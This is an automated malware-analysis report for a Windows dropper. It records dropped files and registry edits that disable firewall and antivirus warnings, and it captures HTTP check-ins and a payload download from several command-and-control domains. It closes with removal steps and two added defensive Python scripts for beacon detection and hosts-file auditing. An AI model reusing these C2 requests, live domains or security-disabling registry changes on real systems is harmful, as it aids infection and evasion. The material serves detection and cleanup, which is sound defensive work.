Gen.Variant.Kazy.164619_40379e7014

by malwarelabrobot on May 24th, 2014 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Kazy.164619 (B) (Emsisoft), Gen:Variant.Kazy.164619 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour:


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 40379e70144f47ab9b9862a466dd0367
SHA1: f24a30759898b5277a2d4f1887332031d44b5eb5
SHA256: 1e9156cacf429e2b36be59f986229390f389b277a5ba7dea961d1a28986621b9
SSDeep: 24576:qWbZqPJHHA6XEP8XH1Iz z7ak6y1w0Kxjwr:qWbQu6UP8XSKz QRs
Size: 859136 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-16 00:19:45
Analyzed on: WindowsXP SP3 32-bit


Summary:

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

manmps2pohkzu4.exe:6060
manmps1us2kzu4.exe:4980
hweynoxcrj.exe:3148
hweynoxcrj.exe:4308
manmps1tunkzu4rilnmw.exe:2484
manmps32eekzu4.exe:4484
hiovbxkmtrdw.exe:3796
hiovbxkmtrdw.exe:2392
%original file name%.exe:536

The Malware injects its code into the following process(es):
No processes have been created.

File activity

The process manmps2pohkzu4.exe:6060 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)

The process hweynoxcrj.exe:3148 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\rng (60 bytes)
%WinDir%\Temp\manmps32eekzu4.exe (35 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\yervcmzvvvzjvyg\cfg (325 bytes)
%System%\yervcmzvvvzjvyg\tst (10 bytes)
%System%\yervcmzvvvzjvyg\run (10 bytes)
%System%\hiovbxkmtrdw.exe (6841 bytes)
%System%\yervcmzvvvzjvyg\por (1 bytes)
%WinDir%\Temp\manmps2pohkzu4.exe (6841 bytes)
%WinDir%\Temp\manmps1us2kzu4.exe (35 bytes)
%System%\yervcmzvvvzjvyg\ihst (224 bytes)

The Malware deletes the following file(s):

%WinDir%\Temp\manmps2pohkzu4.exe (0 bytes)
%WinDir%\Temp\manmps1us2kzu4.exe (0 bytes)
%WinDir%\Temp\manmps32eekzu4.exe (0 bytes)

The process hweynoxcrj.exe:4308 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)

The process manmps1tunkzu4rilnmw.exe:2484 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\etc (10 bytes)
%System%\yervcmzvvvzjvyg\tst (10 bytes)
%System%\hweynoxcrj.exe (6841 bytes)
%System%\drivers\etc\hosts (22 bytes)

The Malware deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process hiovbxkmtrdw.exe:3796 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)

The process hiovbxkmtrdw.exe:2392 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)

The process %original file name%.exe:536 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\manmps1tunkzu4rilnmw.exe (6300 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\manmps1tunkzu4rilnmw.exe (0 bytes)

Registry activity

The process manmps2pohkzu4.exe:6060 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 D7 26 85 49 1B 9C E4 4D AE 1D 9B 25 0B F8 75"

The process manmps1us2kzu4.exe:4980 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 91 CA 4D BA 8D D3 D2 1A DA 0D 8B 91 86 C9 CA"

The process hweynoxcrj.exe:3148 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 A0 D5 FF C5 FB 79 78 AF 9F 02 5B 60 51 01 A3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process manmps1tunkzu4rilnmw.exe:2484 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 BC 7B 99 8E DA 3A B4 E2 E7 42 FD 14 37 8B ED"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Netlogon Smart Parental Foundation" = "%System%\hweynoxcrj.exe"

The process manmps32eekzu4.exe:4484 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 4B 87 F6 27 81 A6 4E 97 11 E5 1E DC 01 C5 C3"

Dropped PE files

MD5 File path
476f447617f65eebf35c52d4fd3b3188 c:\WINDOWS\Temp\manmps32eekzu4.exe

HOSTS file anomalies

The Malware modifies the "%System%\drivers\etc\hosts" file, which is used to map host names to IP addresses.
The modified file is 804 bytes in size. The following strings are added to the hosts file:



Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 679878 679936 4.70837 9eb5b1c585b3d9c82eaa9065e485ca27
.rdata 684032 52424 52736 3.65191 2cd9100ed1242de4caa92b99c9aa1032
.data 737280 159132 125440 5.49867 867dfd094ee749b6945fb73a580e472c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /dep/win64mroclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: middleevery.net


HTTP/1.0 999 Unable to process request at this time -- error 999
Date: Fri, 23 May 2014 09:56:25 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Age: 0
Server: YTS/1.20.28

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: glasshealth.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:49 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=103
Connection: close
Content-Type: text/html; charset=UTF-8

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: gentlefriend.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:49 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2603
Keep-Alive: timeout=5, max=119
Connection: close
Content-Type: text/html; charset=UTF-8

GET /forum/search.php?method=dep&noxor&file=win64mroclient.exe&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 502 Cannot find server.
Date: Fri, 23 May 2014 09:56:25 GMT
Server: YTS/1.20.28
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 2477

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net


HTTP/1.0 503 Service Temporarily Unavailable
Date: Fri, 23 May 2014 09:55:46 GMT
Content-Type: text/html; charset=iso-8859-1
Age: 0
Server: YTS/1.20.28
<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>503 - 
Service Unavailable..


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: requireneither.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2635
Keep-Alive: timeout=5, max=101
Connection: close
Content-Type: text/html; charset=UTF-8

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: stickmarch.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:46 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2595
Keep-Alive: timeout=5, max=105
Connection: close
Content-Type: text/html; charset=UTF-8

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 200 OK
Date: Fri, 23 May 2014 09:56:21 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28


GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 200 OK
Date: Fri, 23 May 2014 09:56:22 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.20.28

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: mightglossary.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2747
Keep-Alive: timeout=5, max=82
Connection: close
Content-Type: text/html; charset=UTF-8

GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 502 Cannot find server.
Date: Fri, 23 May 2014 09:56:24 GMT
Server: YTS/1.20.28
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 2477

GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 200 OK
Date: Fri, 23 May 2014 09:56:24 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: throughcountry.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:56:07 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2715
Keep-Alive: timeout=5, max=124
Connection: close
Content-Type: text/html; charset=UTF-8

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: rememberpaint.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:58 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2593
Keep-Alive: timeout=5, max=112
Connection: close
Content-Type: text/html; charset=UTF-8
<!--
top.location="hXXp://rememberpaint.net/?fp=2BHPLgVpOmfswnLqnbxJLBBYWuwDTVnUru+qi4d8oPxEddcvCnrbJNde5MULHUDY8t1IuaIopFRW5j6rYRnLzA==&prvtof=iPFmR4XQT0XLnLosDEUFS4QCUJB5pqM0Uz7Xpb+KBJA=&poru=xhBEVDczgwgtGs3ELApSQfd24RnBLOzw2s4kucOYD/34RGpj8D9rx5NQyCooWAaCZJ10W7V7XiwWzIADatecbdEEi/8PKRJcWKZDCiTnXDiVRbteiJYG3mHSo4lZOwpd&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce05";
/*
-->
<script type="text/javascript">
<!--
dimensionUpdated = 0;
function applyFrameKiller()
{
    if(window.top != self)
    {
        cHeight = 0;
        if( typeof( window.innerHeight ) != 'undefined' ) {
            //Non-IE
            cHeight = window.innerHeight;
            dimensionUpdated = 1;
        } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
            //IE 6 in 'standards compliant mode'
            cHeight = document.documentElement.clientHeight;
            dimensionUpdated = 1;
        } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
            //IE 4 compatible
            cHeight = document.body.clientHeight;
            dimensionUpdated = 1;
        }
        if( cHeight <= 250 && dimensionUpdated == 1)
        {
            window.top.location = "hXXp://rememberpaint.net/?fp=2BHPLgVpOmfswnLqnbxJLBBYWuwDTVnUru+qi4d8oPxEddcvCnrbJNde5MULHUDY8t1IuaIopFRW5j6rYRnLzA==&prvtof=Fqot8zq81xYUyze/94ruLPJYl8V25wfUUqcZfvfwYL4=&poru=DDkvU68862i1GxhwTnu0Ir9RyGj14Ih4QgvtFHp9k6zzMVQgi3BlIY2WW3DIGE51AI9Yezy1EY0OpslGsIcaUQ8mRg2zM7/kKpDiU4/PKeDnudchRD2QxGbUtBRGgk

<<< skipped >>>
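The three requests above share one shape: a GET to /forum/search.php on a changing host, always carrying mode=sox, a v= version and the same sox= identifier, with the first check-in (method=setvar, key=cpuinfo) leaking the CPU model string. The detection below, an example added for this page and not part of the sandbox report or of the malware itself, turns that shape into a rule that runs over proxy logs. The log format (one "<host> <request-uri>" entry per line) and the sample entries are constructed for the demonstration; the indicator values come from the captured requests. It matches on the fixed path plus mode=sox and the presence of v= and sox= rather than on v=028, so a version bump does not silently defeat it, and reports the version and bot id for triage.

```python
"""
Flag the 'sox' check-in beacons from the capture above in HTTP proxy logs.

Added example for this page; it is not part of the sandbox report and not the
malware's own code. The log format (one '<host> <request-uri>' entry per line)
and the sample entries are constructed for the demonstration; the indicator
values (the /forum/search.php path, mode=sox, the v= version and the per-bot
sox= identifier) are taken from the requests captured above.
"""
from urllib.parse import urlsplit, parse_qs

# Constructed sample log. Entries 1-3 reproduce the three captured requests;
# entry 4 is a benign forum search on the same path, entry 5 hits the same path
# with a different mode and must not match.
SAMPLE_LOG = """\
spendstudy.net /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0
throughcountry.net /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05
rememberpaint.net /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05
forum.example.org /forum/search.php?keywords=firmware+update&sr=topics
example.net /forum/search.php?method=validate&mode=guest
"""

BEACON_PATH = "/forum/search.php"


def parse_beacon(host, uri):
    """Return a dict describing the beacon when `uri` matches the sox check-in
    shape (fixed path, mode=sox, a v= version and a sox= id), else None.
    Matching on the shape rather than on v=028 keeps the rule useful if the
    version string changes; the version is still reported."""
    parts = urlsplit(uri)
    if parts.path != BEACON_PATH:
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("mode") != ["sox"] or "sox" not in q or "v" not in q:
        return None
    return {
        "host": host,
        "method": q.get("method", [""])[0],
        "version": q["v"][0],
        "sox_id": q["sox"][0],
        # setvar with key=cpuinfo leaks the CPU model string; keep it for triage
        "cpuinfo": q["value"][0] if q.get("key") == ["cpuinfo"] and "value" in q else "",
    }


def scan_log(text):
    """Run parse_beacon over every log entry and collect the matches in order."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, _, uri = line.partition(" ")
        beacon = parse_beacon(host, uri)
        if beacon:
            hits.append(beacon)
    return hits


def beacon_hosts(hits):
    """Distinct C2 hosts seen, for a block list or watch list."""
    return sorted({h["host"] for h in hits})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['host']:22} method={h['method']:9} v={h['version']} sox={h['sox_id']} {h['cpuinfo']}")
    print("C2 hosts:", ", ".join(beacon_hosts(found)))
```

Run against the constructed log it reports the three captured hosts and ignores the two benign entries; the same sox= value across all three hosts is what ties the check-ins to one infected machine, which is the field to pivot on when hunting for further infections in a larger log.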

The Malware connects to the servers at the following location(s):

hweynoxcrj.exe_3148:

.text
`.rdata
@.data
SSSh@
~LSSSh
~ZSSSh
-"3#?=2/2#
u3SSSh
t SSSh@
oG.wSf
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
hweynoxcrj.exe
kzu4.exe
hiovbxkmtrdw.exe
RO.AMoU
>eJ#.Wz
q.Cm3
A/%.d[?W
zH%Xa
2.EWp
FXI'%C
mn.JK
zcÁ
%Documents and Settings%\LocalService
|%System%\hiovbxkmtrdw.exe
|spendstudy.net
WATCHDOGPROC "c:\windows\system32\hweynoxcrj.exe"
%System%\hweynoxcrj.exe
mscoree.dll
KERNEL32.DLL

manmps2pohkzu4.exe_6060:

.text
`.rdata
@.data
SSSh@
~LSSSh
~ZSSSh
-"3#?=2/2#
u3SSSh
t SSSh@
oG.wSf
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
hweynoxcrj.exe
kzu4.exe
hiovbxkmtrdw.exe
RO.AMoU
>eJ#.Wz
q.Cm3
A/%.d[?W
zH%Xa
2.EWp
FXI'%C
mn.JK
zcÁ
%Documents and Settings%\LocalService
%WinDir%\TEMP\manmps2pohkzu4.exe
mscoree.dll
KERNEL32.DLL

hiovbxkmtrdw.exe_2392:

.text
`.rdata
@.data
SSSh@
~LSSSh
~ZSSSh
-"3#?=2/2#
u3SSSh
t SSSh@
oG.wSf
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
hweynoxcrj.exe
kzu4.exe
hiovbxkmtrdw.exe
RO.AMoU
>eJ#.Wz
q.Cm3
A/%.d[?W
zH%Xa
2.EWp
FXI'%C
mn.JK
zcÁ
%Documents and Settings%\LocalService
%System%\hiovbxkmtrdw.exe
mscoree.dll
KERNEL32.DLL


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    manmps2pohkzu4.exe:6060
    manmps1us2kzu4.exe:4980
    hweynoxcrj.exe:3148
    hweynoxcrj.exe:4308
    manmps1tunkzu4rilnmw.exe:2484
    manmps32eekzu4.exe:4484
    hiovbxkmtrdw.exe:3796
    hiovbxkmtrdw.exe:2392
    %original file name%.exe:536

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %System%\yervcmzvvvzjvyg\tst (10 bytes)
    %System%\yervcmzvvvzjvyg\rng (60 bytes)
    %WinDir%\Temp\manmps32eekzu4.exe (35 bytes)
    %System%\drivers\etc\hosts (904 bytes)
    %System%\yervcmzvvvzjvyg\cfg (325 bytes)
    %System%\yervcmzvvvzjvyg\run (10 bytes)
    %System%\hiovbxkmtrdw.exe (6841 bytes)
    %System%\yervcmzvvvzjvyg\por (1 bytes)
    %WinDir%\Temp\manmps2pohkzu4.exe (6841 bytes)
    %WinDir%\Temp\manmps1us2kzu4.exe (35 bytes)
    %System%\yervcmzvvvzjvyg\ihst (224 bytes)
    %System%\yervcmzvvvzjvyg\etc (10 bytes)
    %System%\hweynoxcrj.exe (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\manmps1tunkzu4rilnmw.exe (6300 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Microsoft Netlogon Smart Parental Foundation" = "%System%\hweynoxcrj.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
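Step 5 says to put the hosts file back to its single stock line, but does not say how to find out what was added first, and the report records only that the file grew to 904 bytes, not its contents. The audit below is an example added for this page, not part of the sandbox report: it parses a hosts file, ignores comments and junk, and reports every mapping that is not the stock loopback entry, distinguishing names that were blocked (pointed at loopback or 0.0.0.0, the usual way malware stops updates or security lookups) from names that were redirected to some other address. The sample file is constructed; its extra entries use reserved example names and a TEST-NET-3 address and are not what this sample actually wrote. Accepting "::1 localhost" as stock content is an assumption for newer Windows versions; XP ships only the IPv4 line.

```python
"""
Audit a Windows hosts file for anything beyond the stock loopback mapping.

Added example for this page, not part of the sandbox report. The report records
that this sample rewrote %System%\\drivers\\etc\\hosts (904 bytes) but does not
show the contents, so the sample file below is constructed: the extra entries
use reserved example names and a TEST-NET-3 address and are not the sample's
real additions. Accepting '::1 localhost' as stock content is an assumption
made for newer Windows versions; XP ships only the IPv4 line.
"""
import ipaddress

# Stock mappings the removal step says to restore.
BASELINE = {("127.0.0.1", "localhost"), ("::1", "localhost")}

SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

127.0.0.1       localhost
127.0.0.1       updates.example.org      # constructed: name sinkholed to loopback
0.0.0.0         telemetry.example.net    # constructed: name blackholed
203.0.113.10    login.example.com        # constructed: name pointed at a foreign address
this is not a hosts entry
"""


def parse_hosts(text):
    """Yield (ip, hostname) pairs, one per hostname on a line, skipping comments,
    blank lines and lines whose first field is not an IP address."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            yield (str(ip), name.lower())


def suspicious_entries(text):
    """Return (hostname, ip, kind) for every mapping that is not stock content.
    A loopback or unspecified address blocks the name; any other address
    silently redirects it to a host the attacker controls."""
    findings = []
    for ip, name in parse_hosts(text):
        if (ip, name) in BASELINE:
            continue
        addr = ipaddress.ip_address(ip)
        kind = "blocked" if addr.is_loopback or addr.is_unspecified else "redirected"
        findings.append((name, ip, kind))
    return findings


def restored_hosts():
    """Content to write back, matching removal step 5 above."""
    return "127.0.0.1 localhost\n"


if __name__ == "__main__":
    for name, ip, kind in suspicious_entries(SAMPLE_HOSTS):
        print(f"{kind:10} {name:28} -> {ip}")
```

Record the findings before overwriting the file: the blocked names show which update or security services the infection was trying to cut off, and any redirected names tell you which credentials may have been entered into an attacker-controlled host while the infection was active.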
